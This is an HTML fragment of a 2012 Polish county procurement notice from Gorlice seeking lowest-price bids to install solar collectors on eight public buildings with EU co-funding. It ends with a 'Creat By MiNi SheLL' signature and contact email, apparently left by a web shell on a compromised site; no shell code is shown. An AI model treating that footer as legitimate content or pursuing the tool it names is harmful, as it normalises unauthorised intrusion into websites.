<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2012 godzina 09:30, miejsce: Starostwo Powiatowe w Gorlicach, ul. Biecka 3, 38-300 Gorlice, pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt pn: Ochrona powietrza atmosferycznego przez montaż kolektorów słonecznych na obiektach oświatowych i pomocy społecznej Powiatu Gorlickiego, współfinansowanego środkami Unii Europejskiej w Ramach Małopolskiego Regionalnego Programu Operacyjnego. Działanie 7.2..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku  Specjalnego Ośrodka Szkolno- Wychowawczego w 		Szymbarku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku  Specjalnego Ośrodka Szkolno- Wychowawczego w 	Szymbarku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku  Specjalnego Ośrodka Szkolno- 	Wychowawczego w 		Kobylance..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku  Specjalnego Ośrodka Szkolno- 	Wychowawczego w 		Kobylance..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku Internatu Zespołu Szkół Nr 1 w  Gorlicach  ul. 			Wyszyńskiego 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku Internatu Zespołu Szkół Nr 1 w  Gorlicach  ul. 			Wyszyńskiego 11..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku Internatu Zespołu Szkół  Zawodowych w Bobowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku Internatu Zespołu Szkół  Zawodowych w Bobowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku Powiatowego Zespołu Placówek Oświatowych w 			Bieczu (dawniej Internat ZSO w Bieczu )..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku Powiatowego Zespołu Placówek Oświatowych w Bieczu (dawniej Internat ZSO w Bieczu )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej w Gorlicach ul. 			Sienkiewicza 30..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej w Gorlicach ul. 			Sienkiewicza 30..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej  w Klimkówce..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej  w Klimkówce..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej  w Gorlicach  ul. 			Michalusa 14 wraz z budową kotłowni gazowej dla potrzeb ciepłej wody użytkowej , oraz przebudową 			istniejącej wymiennikowni ciepła ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie instalacji kolektorów słonecznych na budynku Domu Pomocy Społecznej  w Gorlicach  ul. 			Michalusa 14 wraz z budową kotłowni gazowej dla potrzeb ciepłej wody użytkowej , oraz przebudową 			istniejącej wymiennikowni ciepła ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-0, 09.33.11.00-9, 45.33.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com